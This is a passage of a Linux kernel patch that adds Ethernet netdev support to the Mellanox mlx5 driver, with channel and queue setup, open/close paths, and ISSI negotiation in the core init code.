dev_to_node(&priv->mdev->pdev->dev); + param->wq.linear = 1; +} + +static void mlx5e_build_sq_param(struct mlx5e_priv *priv, + struct mlx5e_sq_param *param) +{ + void *sqc = param->sqc; + void *wq = MLX5_ADDR_OF(sqc, sqc, wq); + + MLX5_SET(wq, wq, log_wq_sz, priv->params.log_sq_size); + MLX5_SET(wq, wq, log_wq_stride, ilog2(MLX5_SEND_WQE_BB)); + MLX5_SET(wq, wq, pd, priv->pdn); + + param->wq.numa = dev_to_node(&priv->mdev->pdev->dev); +} + +static void mlx5e_build_common_cq_param(struct mlx5e_priv *priv, + struct mlx5e_cq_param *param) +{ + void *cqc = param->cqc; + + MLX5_SET(cqc, cqc, uar_page, priv->cq_uar.index); +} + +static void mlx5e_build_rx_cq_param(struct mlx5e_priv *priv, + struct mlx5e_cq_param *param) +{ + void *cqc = param->cqc; + + MLX5_SET(cqc, cqc, log_cq_size, priv->params.log_rq_size); + + mlx5e_build_common_cq_param(priv, param); +} + +static void mlx5e_build_tx_cq_param(struct mlx5e_priv *priv, + struct mlx5e_cq_param *param) +{ + void *cqc = param->cqc; + + MLX5_SET(cqc, cqc, log_cq_size, priv->params.log_sq_size); + + mlx5e_build_common_cq_param(priv, param); +} + +static void mlx5e_build_channel_param(struct mlx5e_priv *priv, + struct mlx5e_channel_param *cparam) +{ + memset(cparam, 0, sizeof(*cparam)); + + mlx5e_build_rq_param(priv, &cparam->rq); + mlx5e_build_sq_param(priv, &cparam->sq); + mlx5e_build_rx_cq_param(priv, &cparam->rx_cq); + mlx5e_build_tx_cq_param(priv, &cparam->tx_cq); +} + +static int mlx5e_open_channels(struct mlx5e_priv *priv) +{ + struct mlx5e_channel_param cparam; + int err; + int i; + int j; + + priv->channel = kcalloc(priv->params.num_channels, + sizeof(struct mlx5e_channel *), GFP_KERNEL); + if (!priv->channel) + return -ENOMEM; + + mlx5e_build_channel_param(priv, &cparam); + for (i = 0; i < priv->params.num_channels; i++) { + err = mlx5e_open_channel(priv, i, &cparam, &priv->channel[i]); + if (err) + goto err_close_channels; + } + + for (j = 0; j < priv->params.num_channels; j++) { + err = mlx5e_wait_for_min_rx_wqes(&priv->channel[j]->rq); + if (err) + goto err_close_channels; + } + + return 0; + +err_close_channels: + for (i--; i >= 0; i--) + mlx5e_close_channel(priv->channel[i]); + + kfree(priv->channel); + + return err; +} + +static void mlx5e_close_channels(struct mlx5e_priv *priv) +{ + int i; + + for (i = 0; i < priv->params.num_channels; i++) + mlx5e_close_channel(priv->channel[i]); + + kfree(priv->channel); +} + +static int mlx5e_open_tis(struct mlx5e_priv *priv, int tc) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u32 in[MLX5_ST_SZ_DW(create_tis_in)]; + void *tisc = MLX5_ADDR_OF(create_tis_in, in, ctx); + + memset(in, 0, sizeof(in)); + + MLX5_SET(tisc, tisc, prio, tc); + + return mlx5_create_tis(mdev, in, sizeof(in), &priv->tisn[tc]); +} + +static void mlx5e_close_tis(struct mlx5e_priv *priv, int tc) +{ + mlx5_destroy_tis(priv->mdev, priv->tisn[tc]); +} + +static int mlx5e_open_tises(struct mlx5e_priv *priv) +{ + int num_tc = priv->num_tc; + int err; + int tc; + + for (tc = 0; tc < num_tc; tc++) { + err = mlx5e_open_tis(priv, tc); + if (err) + goto err_close_tises; + } + + return 0; + +err_close_tises: + for (tc--; tc >= 0; tc--) + mlx5e_close_tis(priv, tc); + + return err; +} + +static void mlx5e_close_tises(struct mlx5e_priv *priv) +{ + int num_tc = priv->num_tc; + int tc; + + for (tc = 0; tc < num_tc; tc++) + mlx5e_close_tis(priv, tc); +} + +static int mlx5e_open_rqt(struct mlx5e_priv *priv) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u32 *in; + u32 out[MLX5_ST_SZ_DW(create_rqt_out)]; + void *rqtc; + int inlen; + int err; + int sz; + int i; + + sz = 1 << priv->params.rx_hash_log_tbl_sz; + + inlen = MLX5_ST_SZ_BYTES(create_rqt_in) + sizeof(u32) * sz; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + rqtc = MLX5_ADDR_OF(create_rqt_in, in, rqt_context); + + MLX5_SET(rqtc, rqtc, rqt_actual_size, sz); + MLX5_SET(rqtc, rqtc, rqt_max_size, sz); + + for (i = 0; i < sz; i++) { + int ix = i % priv->params.num_channels; + + MLX5_SET(rqtc, rqtc, rq_num[i], priv->channel[ix]->rq.rqn); + } + + MLX5_SET(create_rqt_in, in, opcode, MLX5_CMD_OP_CREATE_RQT); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(mdev, in, inlen, out, sizeof(out)); + if (!err) + priv->rqtn = MLX5_GET(create_rqt_out, out, rqtn); + + kvfree(in); + + return err; +} + +static void mlx5e_close_rqt(struct mlx5e_priv *priv) +{ + u32 in[MLX5_ST_SZ_DW(destroy_rqt_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_rqt_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_rqt_in, in, opcode, MLX5_CMD_OP_DESTROY_RQT); + MLX5_SET(destroy_rqt_in, in, rqtn, priv->rqtn); + + mlx5_cmd_exec_check_status(priv->mdev, in, sizeof(in), out, + sizeof(out)); +} + +static void mlx5e_build_tir_ctx(struct mlx5e_priv *priv, u32 *tirc, int tt) +{ + void *hfso = MLX5_ADDR_OF(tirc, tirc, rx_hash_field_selector_outer); + +#define ROUGH_MAX_L2_L3_HDR_SZ 256 + +#define MLX5_HASH_IP (MLX5_HASH_FIELD_SEL_SRC_IP |\ + MLX5_HASH_FIELD_SEL_DST_IP) + +#define MLX5_HASH_ALL (MLX5_HASH_FIELD_SEL_SRC_IP |\ + MLX5_HASH_FIELD_SEL_DST_IP |\ + MLX5_HASH_FIELD_SEL_L4_SPORT |\ + MLX5_HASH_FIELD_SEL_L4_DPORT) + + if (priv->params.lro_en) { + MLX5_SET(tirc, tirc, lro_enable_mask, + MLX5_TIRC_LRO_ENABLE_MASK_IPV4_LRO | + MLX5_TIRC_LRO_ENABLE_MASK_IPV6_LRO); + MLX5_SET(tirc, tirc, lro_max_ip_payload_size, + (priv->params.lro_wqe_sz - + ROUGH_MAX_L2_L3_HDR_SZ) >> 8); + MLX5_SET(tirc, tirc, lro_timeout_period_usecs, + MLX5_CAP_ETH(priv->mdev, + lro_timer_supported_periods[3])); + } + + switch (tt) { + case MLX5E_TT_ANY: + MLX5_SET(tirc, tirc, disp_type, + MLX5_TIRC_DISP_TYPE_DIRECT); + MLX5_SET(tirc, tirc, inline_rqn, + priv->channel[0]->rq.rqn); + break; + default: + MLX5_SET(tirc, tirc, disp_type, + MLX5_TIRC_DISP_TYPE_INDIRECT); + MLX5_SET(tirc, tirc, indirect_table, + priv->rqtn); + MLX5_SET(tirc, tirc, rx_hash_fn, + MLX5_TIRC_RX_HASH_FN_HASH_TOEPLITZ); + MLX5_SET(tirc, tirc, rx_hash_symmetric, 1); + netdev_rss_key_fill(MLX5_ADDR_OF(tirc, tirc, + rx_hash_toeplitz_key), + MLX5_FLD_SZ_BYTES(tirc, + rx_hash_toeplitz_key)); + break; + } + + switch (tt) { + case MLX5E_TT_IPV4_TCP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV4); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_TCP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV6_TCP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV6); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_TCP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV4_UDP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV4); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_UDP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV6_UDP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV6); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_UDP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV4: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV4); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_IP); + break; + + case MLX5E_TT_IPV6: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV6); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_IP); + break; + } +} + +static int mlx5e_open_tir(struct mlx5e_priv *priv, int tt) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u32 *in; + void *tirc; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_tir_in); + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + tirc = MLX5_ADDR_OF(create_tir_in, in, ctx); + + mlx5e_build_tir_ctx(priv, tirc, tt); + + err = mlx5_create_tir(mdev, in, inlen, &priv->tirn[tt]); + + kvfree(in); + + return err; +} + +static void mlx5e_close_tir(struct mlx5e_priv *priv, int tt) +{ + mlx5_destroy_tir(priv->mdev, priv->tirn[tt]); +} + +static int mlx5e_open_tirs(struct mlx5e_priv *priv) +{ + int err; + int i; + + for (i = 0; i < MLX5E_NUM_TT; i++) { + err = mlx5e_open_tir(priv, i); + if (err) + goto err_close_tirs; + } + + return 0; + +err_close_tirs: + for (i--; i >= 0; i--) + mlx5e_close_tir(priv, i); + + return err; +} + +static void mlx5e_close_tirs(struct mlx5e_priv *priv) +{ + int i; + + for (i = 0; i < MLX5E_NUM_TT; i++) + mlx5e_close_tir(priv, i); +} + +int mlx5e_open_locked(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + int actual_mtu; + int num_txqs; + int err; + + num_txqs = roundup_pow_of_two(priv->params.num_channels) * + priv->params.num_tc; + netif_set_real_num_tx_queues(netdev, num_txqs); + netif_set_real_num_rx_queues(netdev, priv->params.num_channels); + + err = mlx5_set_port_mtu(mdev, netdev->mtu); + if (err) { + netdev_err(netdev, "%s: mlx5_set_port_mtu failed %d\n", + __func__, err); + return err; + } + + err = mlx5_query_port_oper_mtu(mdev, &actual_mtu); + if (err) { + netdev_err(netdev, "%s: mlx5_query_port_oper_mtu failed %d\n", + __func__, err); + return err; + } + + if (actual_mtu != netdev->mtu) + netdev_warn(netdev, "%s: Failed to set MTU to %d\n", + __func__, netdev->mtu); + + netdev->mtu = actual_mtu; + + err = mlx5e_open_tises(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_tises failed, %d\n", + __func__, err); + return err; + } + + err = mlx5e_open_channels(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_channels failed, %d\n", + __func__, err); + goto err_close_tises; + } + + err = mlx5e_open_rqt(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_rqt failed, %d\n", + __func__, err); + goto err_close_channels; + } + + err = mlx5e_open_tirs(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_tir failed, %d\n", + __func__, err); + goto err_close_rqls; + } + + err = mlx5e_open_flow_table(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_flow_table failed, %d\n", + __func__, err); + goto err_close_tirs; + } + + err = mlx5e_add_all_vlan_rules(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_add_all_vlan_rules failed, %d\n", + __func__, err); + goto err_close_flow_table; + } + + mlx5e_init_eth_addr(priv); + + set_bit(MLX5E_STATE_OPENED, &priv->state); + + mlx5e_update_carrier(priv); + mlx5e_set_rx_mode_core(priv); + + schedule_delayed_work(&priv->update_stats_work, 0); + return 0; + +err_close_flow_table: + mlx5e_close_flow_table(priv); + +err_close_tirs: + mlx5e_close_tirs(priv); + +err_close_rqls: + mlx5e_close_rqt(priv); + +err_close_channels: + mlx5e_close_channels(priv); + +err_close_tises: + mlx5e_close_tises(priv); + + return err; +} + +static int mlx5e_open(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + int err; + + mutex_lock(&priv->state_lock); + err = mlx5e_open_locked(netdev); + mutex_unlock(&priv->state_lock); + + return err; +} + +int mlx5e_close_locked(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + clear_bit(MLX5E_STATE_OPENED, &priv->state); + + mlx5e_set_rx_mode_core(priv); + mlx5e_del_all_vlan_rules(priv); + netif_carrier_off(priv->netdev); + mlx5e_close_flow_table(priv); + mlx5e_close_tirs(priv); + mlx5e_close_rqt(priv); + mlx5e_close_channels(priv); + mlx5e_close_tises(priv); + + return 0; +} + +static int mlx5e_close(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + int err; + + mutex_lock(&priv->state_lock); + err = mlx5e_close_locked(netdev); + mutex_unlock(&priv->state_lock); + + return err; +} + +int mlx5e_update_priv_params(struct mlx5e_priv *priv, + struct mlx5e_params *new_params) +{ + int err = 0; + int was_opened; + + WARN_ON(!mutex_is_locked(&priv->state_lock)); + + was_opened = test_bit(MLX5E_STATE_OPENED, &priv->state); + if (was_opened) + mlx5e_close_locked(priv->netdev); + + priv->params = *new_params; + + if (was_opened) + err = mlx5e_open_locked(priv->netdev); + + return err; +} + +static struct rtnl_link_stats64 * +mlx5e_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + struct mlx5e_vport_stats *vstats = &priv->stats.vport; + + stats->rx_packets = vstats->rx_packets; + stats->rx_bytes = vstats->rx_bytes; + stats->tx_packets = vstats->tx_packets; + stats->tx_bytes = vstats->tx_bytes; + stats->multicast = vstats->rx_multicast_packets + + vstats->tx_multicast_packets; + stats->tx_errors = vstats->tx_error_packets; + stats->rx_errors = vstats->rx_error_packets; + stats->tx_dropped = vstats->tx_queue_dropped; + stats->rx_crc_errors = 0; + stats->rx_length_errors = 0; + + return stats; +} + +static void mlx5e_set_rx_mode(struct net_device *dev) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + schedule_work(&priv->set_rx_mode_work); +} + +static int mlx5e_set_mac(struct net_device *netdev, void *addr) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct sockaddr *saddr = addr; + + if (!is_valid_ether_addr(saddr->sa_data)) + return -EADDRNOTAVAIL; + + netif_addr_lock_bh(netdev); + ether_addr_copy(netdev->dev_addr, saddr->sa_data); + netif_addr_unlock_bh(netdev); + + schedule_work(&priv->set_rx_mode_work); + + return 0; +} + +static int mlx5e_set_features(struct net_device *netdev, + netdev_features_t features) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + netdev_features_t changes = features ^ netdev->features; + struct mlx5e_params new_params; + bool update_params = false; + + mutex_lock(&priv->state_lock); + new_params = priv->params; + + if (changes & NETIF_F_LRO) { + new_params.lro_en = !!(features & NETIF_F_LRO); + update_params = true; + } + + if (update_params) + mlx5e_update_priv_params(priv, &new_params); + + if (changes & NETIF_F_HW_VLAN_CTAG_FILTER) { + if (features & NETIF_F_HW_VLAN_CTAG_FILTER) + mlx5e_enable_vlan_filter(priv); + else + mlx5e_disable_vlan_filter(priv); + } + + mutex_unlock(&priv->state_lock); + + return 0; +} + +static int mlx5e_change_mtu(struct net_device *netdev, int new_mtu) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + int max_mtu; + int err = 0; + + err = mlx5_query_port_max_mtu(mdev, &max_mtu); + if (err) + return err; + + if (new_mtu > max_mtu || new_mtu < MLX5E_PARAMS_MIN_MTU) { + netdev_err(netdev, "%s: Bad MTU size, mtu must be [%d-%d]\n", + __func__, MLX5E_PARAMS_MIN_MTU, max_mtu); + return -EINVAL; + } + + mutex_lock(&priv->state_lock); + netdev->mtu = new_mtu; + err = mlx5e_update_priv_params(priv, &priv->params); + mutex_unlock(&priv->state_lock); + + return err; +} + +static struct net_device_ops mlx5e_netdev_ops = { + .ndo_open = mlx5e_open, + .ndo_stop = mlx5e_close, + .ndo_start_xmit = mlx5e_xmit, + .ndo_get_stats64 = mlx5e_get_stats, + .ndo_set_rx_mode = mlx5e_set_rx_mode, + .ndo_set_mac_address = mlx5e_set_mac, + .ndo_vlan_rx_add_vid = mlx5e_vlan_rx_add_vid, + .ndo_vlan_rx_kill_vid = mlx5e_vlan_rx_kill_vid, + .ndo_set_features = mlx5e_set_features, + .ndo_change_mtu = mlx5e_change_mtu, +}; + +static int mlx5e_check_required_hca_cap(struct mlx5_core_dev *mdev) +{ + if (MLX5_CAP_GEN(mdev, port_type) != MLX5_CAP_PORT_TYPE_ETH) + return -ENOTSUPP; + if (!MLX5_CAP_GEN(mdev, eth_net_offloads) || + !MLX5_CAP_GEN(mdev, nic_flow_table) || + !MLX5_CAP_ETH(mdev, csum_cap) || + !MLX5_CAP_ETH(mdev, max_lso_cap) || + !MLX5_CAP_ETH(mdev, vlan_cap) || + !MLX5_CAP_ETH(mdev, rss_ind_tbl_cap)) { + mlx5_core_warn(mdev, + "Not creating net device, some required device capabilities are missing\n"); + return -ENOTSUPP; + } + return 0; +} + +static void mlx5e_build_netdev_priv(struct mlx5_core_dev *mdev, + struct net_device *netdev, + int num_comp_vectors) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + priv->params.log_sq_size = + MLX5E_PARAMS_DEFAULT_LOG_SQ_SIZE; + priv->params.log_rq_size = + MLX5E_PARAMS_DEFAULT_LOG_RQ_SIZE; + priv->params.rx_cq_moderation_usec = + MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_USEC; + priv->params.rx_cq_moderation_pkts = + MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_PKTS; + priv->params.tx_cq_moderation_usec = + MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_USEC; + priv->params.tx_cq_moderation_pkts = + MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_PKTS; + priv->params.min_rx_wqes = + MLX5E_PARAMS_DEFAULT_MIN_RX_WQES; + priv->params.rx_hash_log_tbl_sz = + (order_base_2(num_comp_vectors) > + MLX5E_PARAMS_DEFAULT_RX_HASH_LOG_TBL_SZ) ? + order_base_2(num_comp_vectors) : + MLX5E_PARAMS_DEFAULT_RX_HASH_LOG_TBL_SZ; + priv->params.num_tc = 1; + priv->params.default_vlan_prio = 0; + + priv->params.lro_en = false && !!MLX5_CAP_ETH(priv->mdev, lro_cap); + priv->params.lro_wqe_sz = + MLX5E_PARAMS_DEFAULT_LRO_WQE_SZ; + + priv->mdev = mdev; + priv->netdev = netdev; + priv->params.num_channels = num_comp_vectors; + priv->order_base_2_num_channels = order_base_2(num_comp_vectors); + priv->queue_mapping_channel_mask = + roundup_pow_of_two(num_comp_vectors) - 1; + priv->num_tc = priv->params.num_tc; + priv->default_vlan_prio = priv->params.default_vlan_prio; + + spin_lock_init(&priv->async_events_spinlock); + mutex_init(&priv->state_lock); + + INIT_WORK(&priv->update_carrier_work, mlx5e_update_carrier_work); + INIT_WORK(&priv->set_rx_mode_work, mlx5e_set_rx_mode_work); + INIT_DELAYED_WORK(&priv->update_stats_work, mlx5e_update_stats_work); +} + +static void mlx5e_set_netdev_dev_addr(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + mlx5_query_vport_mac_address(priv->mdev, netdev->dev_addr); +} + +static void mlx5e_build_netdev(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + + SET_NETDEV_DEV(netdev, &mdev->pdev->dev); + + if (priv->num_tc > 1) { + mlx5e_netdev_ops.ndo_select_queue = mlx5e_select_queue; + mlx5e_netdev_ops.ndo_start_xmit = mlx5e_xmit_multi_tc; + } + + netdev->netdev_ops = &mlx5e_netdev_ops; + netdev->watchdog_timeo = 15 * HZ; + + netdev->ethtool_ops = &mlx5e_ethtool_ops; + + netdev->vlan_features |= NETIF_F_IP_CSUM; + netdev->vlan_features |= NETIF_F_IPV6_CSUM; + netdev->vlan_features |= NETIF_F_GRO; + netdev->vlan_features |= NETIF_F_TSO; + netdev->vlan_features |= NETIF_F_TSO6; + netdev->vlan_features |= NETIF_F_RXCSUM; + netdev->vlan_features |= NETIF_F_RXHASH; + + if (!!MLX5_CAP_ETH(mdev, lro_cap)) + netdev->vlan_features |= NETIF_F_LRO; + + netdev->hw_features = netdev->vlan_features; + netdev->hw_features |= NETIF_F_HW_VLAN_CTAG_TX; + netdev->hw_features |= NETIF_F_HW_VLAN_CTAG_RX; + netdev->hw_features |= NETIF_F_HW_VLAN_CTAG_FILTER; + + netdev->features = netdev->hw_features; + if (!priv->params.lro_en) + netdev->features &= ~NETIF_F_LRO; + + netdev->features |= NETIF_F_HIGHDMA; + + netdev->priv_flags |= IFF_UNICAST_FLT; + + mlx5e_set_netdev_dev_addr(netdev); +} + +static int mlx5e_create_mkey(struct mlx5e_priv *priv, u32 pdn, + struct mlx5_core_mr *mr) +{ + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5_create_mkey_mbox_in *in; + int err; + + in = mlx5_vzalloc(sizeof(*in)); + if (!in) + return -ENOMEM; + + in->seg.flags = MLX5_PERM_LOCAL_WRITE | + MLX5_PERM_LOCAL_READ | + MLX5_ACCESS_MODE_PA; + in->seg.flags_pd = cpu_to_be32(pdn | MLX5_MKEY_LEN64); + in->seg.qpn_mkey7_0 = cpu_to_be32(0xffffff << 8); + + err = mlx5_core_create_mkey(mdev, mr, in, sizeof(*in), NULL, NULL, + NULL); + + kvfree(in); + + return err; +} + +static void *mlx5e_create_netdev(struct mlx5_core_dev *mdev) +{ + struct net_device *netdev; + struct mlx5e_priv *priv; + int ncv = mdev->priv.eq_table.num_comp_vectors; + int err; + + if (mlx5e_check_required_hca_cap(mdev)) + return NULL; + + netdev = alloc_etherdev_mqs(sizeof(struct mlx5e_priv), + roundup_pow_of_two(ncv) * MLX5E_MAX_NUM_TC, + ncv); + if (!netdev) { + mlx5_core_err(mdev, "alloc_etherdev_mqs() failed\n"); + return NULL; + } + + mlx5e_build_netdev_priv(mdev, netdev, ncv); + mlx5e_build_netdev(netdev); + + netif_carrier_off(netdev); + + priv = netdev_priv(netdev); + + err = mlx5_alloc_map_uar(mdev, &priv->cq_uar); + if (err) { + netdev_err(netdev, "%s: mlx5_alloc_map_uar failed, %d\n", + __func__, err); + goto err_free_netdev; + } + + err = mlx5_core_alloc_pd(mdev, &priv->pdn); + if (err) { + netdev_err(netdev, "%s: mlx5_core_alloc_pd failed, %d\n", + __func__, err); + goto err_unmap_free_uar; + } + + err = mlx5e_create_mkey(priv, priv->pdn, &priv->mr); + if (err) { + netdev_err(netdev, "%s: mlx5e_create_mkey failed, %d\n", + __func__, err); + goto err_dealloc_pd; + } + + err = register_netdev(netdev); + if (err) { + netdev_err(netdev, "%s: register_netdev failed, %d\n", + __func__, err); + goto err_destroy_mkey; + } + + mlx5e_enable_async_events(priv); + + return priv; + +err_destroy_mkey: + mlx5_core_destroy_mkey(mdev, &priv->mr); + +err_dealloc_pd: + mlx5_core_dealloc_pd(mdev, priv->pdn); + +err_unmap_free_uar: + mlx5_unmap_free_uar(mdev, &priv->cq_uar); + +err_free_netdev: + free_netdev(netdev); + + return NULL; +} + +static void mlx5e_destroy_netdev(struct mlx5_core_dev *mdev, void *vpriv) +{ + struct mlx5e_priv *priv = vpriv; + struct net_device *netdev = priv->netdev; + + unregister_netdev(netdev); + mlx5_core_destroy_mkey(priv->mdev, &priv->mr); + mlx5_core_dealloc_pd(priv->mdev, priv->pdn); + mlx5_unmap_free_uar(priv->mdev, &priv->cq_uar); + mlx5e_disable_async_events(priv); + flush_scheduled_work(); + free_netdev(netdev); +} + +static void *mlx5e_get_netdev(void *vpriv) +{ + struct mlx5e_priv *priv = vpriv; + + return priv->netdev; +} + +static struct mlx5_interface mlx5e_interface = { + .add = mlx5e_create_netdev, + .remove = mlx5e_destroy_netdev, + .event = mlx5e_async_event, + .protocol = MLX5_INTERFACE_PROTOCOL_ETH, + .get_dev = mlx5e_get_netdev, +}; + +void mlx5e_init(void) +{ + mlx5_register_interface(&mlx5e_interface); +} + +void mlx5e_cleanup(void) +{ + mlx5_unregister_interface(&mlx5e_interface); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index e7b7b123a128..1c37f587426d 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -48,10 +48,6 @@ #include #include "mlx5_core.h" -#define DRIVER_NAME "mlx5_core" -#define DRIVER_VERSION "3.0" -#define DRIVER_RELDATE "January 2015" - MODULE_AUTHOR("Eli Cohen "); MODULE_DESCRIPTION("Mellanox Connect-IB, ConnectX-4 core driver"); MODULE_LICENSE("Dual BSD/GPL"); @@ -614,6 +610,61 @@ static int alloc_comp_eqs(struct mlx5_core_dev *dev) return err; } +#ifdef CONFIG_MLX5_CORE_EN +static int mlx5_core_set_issi(struct mlx5_core_dev *dev) +{ + u32 query_in[MLX5_ST_SZ_DW(query_issi_in)]; + u32 query_out[MLX5_ST_SZ_DW(query_issi_out)]; + u32 set_in[MLX5_ST_SZ_DW(set_issi_in)]; + u32 set_out[MLX5_ST_SZ_DW(set_issi_out)]; + int err; + u32 sup_issi; + + memset(query_in, 0, sizeof(query_in)); + memset(query_out, 0, sizeof(query_out)); + + MLX5_SET(query_issi_in, query_in, opcode, MLX5_CMD_OP_QUERY_ISSI); + + err = mlx5_cmd_exec_check_status(dev, query_in, sizeof(query_in), + query_out, sizeof(query_out)); + if (err) { + if (((struct mlx5_outbox_hdr *)query_out)->status == + MLX5_CMD_STAT_BAD_OP_ERR) { + pr_debug("Only ISSI 0 is supported\n"); + return 0; + } + + pr_err("failed to query ISSI\n"); + return err; + } + + sup_issi = MLX5_GET(query_issi_out, query_out, supported_issi_dw0); + + if (sup_issi & (1 << 1)) { + memset(set_in, 0, sizeof(set_in)); + memset(set_out, 0, sizeof(set_out)); + + MLX5_SET(set_issi_in, set_in, opcode, MLX5_CMD_OP_SET_ISSI); + MLX5_SET(set_issi_in, set_in, current_issi, 1); + + err = mlx5_cmd_exec_check_status(dev, set_in, sizeof(set_in), + set_out, sizeof(set_out)); + if (err) { + pr_err("failed to set ISSI=1\n"); + return err; + } + + dev->issi = 1; + + return 0; + } else if (sup_issi & (1 << 0)) { + return 0; + } + + return -ENOTSUPP; +} +#endif + static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) { struct mlx5_priv *priv = &dev->priv; @@ -676,6 +727,14 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) goto err_pagealloc_cleanup; } +#ifdef CONFIG_MLX5_CORE_EN + err = mlx5_core_set_issi(dev); + if (err) { + dev_err(&pdev->dev, "failed to set issi\n"); + goto err_disable_hca; + } +#endif + err = mlx5_satisfy_startup_pages(dev, 1); if (err) { dev_err(&pdev->dev, "failed to allocate boot pages\n"); @@ -1084,6 +1143,10 @@ static int __init init(void) if (err) goto err_health; +#ifdef CONFIG_MLX5_CORE_EN + mlx5e_init(); +#endif + return 0; err_health: @@ -1096,6 +1159,9 @@ static int __init init(void) static void __exit cleanup(void) { +#ifdef CONFIG_MLX5_CORE_EN + mlx5e_cleanup(); +#endif pci_unregister_driver(&mlx5_core_driver); mlx5_health_cleanup(); destroy_workqueue(mlx5_core_wq); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h index b986f1c258bc..6983c1047255 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2015, Mellanox Technologies. All rights reserved. + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. * * This software is available to you under a choice of one of two * licenses. You may choose to be licensed under the terms of the GNU @@ -37,6 +37,10 @@ #include #include +#define DRIVER_NAME "mlx5_core" +#define DRIVER_VERSION "3.0-1" +#define DRIVER_RELDATE "January 2015" + extern int mlx5_core_debug_mask; #define mlx5_core_dbg(dev, format, ...) \ @@ -78,4 +82,7 @@ int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev); int mlx5_cmd_teardown_hca(struct mlx5_core_dev *dev); +void mlx5e_init(void); +void mlx5e_cleanup(void); + #endif /* __MLX5_CORE_H__ */ diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index 4ee52bf1f959..b288c538347a 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -1153,4 +1153,23 @@ enum mlx5_cap_type { #define MLX5_CAP_ODP(mdev, cap)\ MLX5_GET(odp_cap, mdev->hca_caps_cur[MLX5_CAP_ODP], cap) +enum { + MLX5_CMD_STAT_OK = 0x0, + MLX5_CMD_STAT_INT_ERR = 0x1, + MLX5_CMD_STAT_BAD_OP_ERR = 0x2, + MLX5_CMD_STAT_BAD_PARAM_ERR = 0x3, + MLX5_CMD_STAT_BAD_SYS_STATE_ERR = 0x4, + 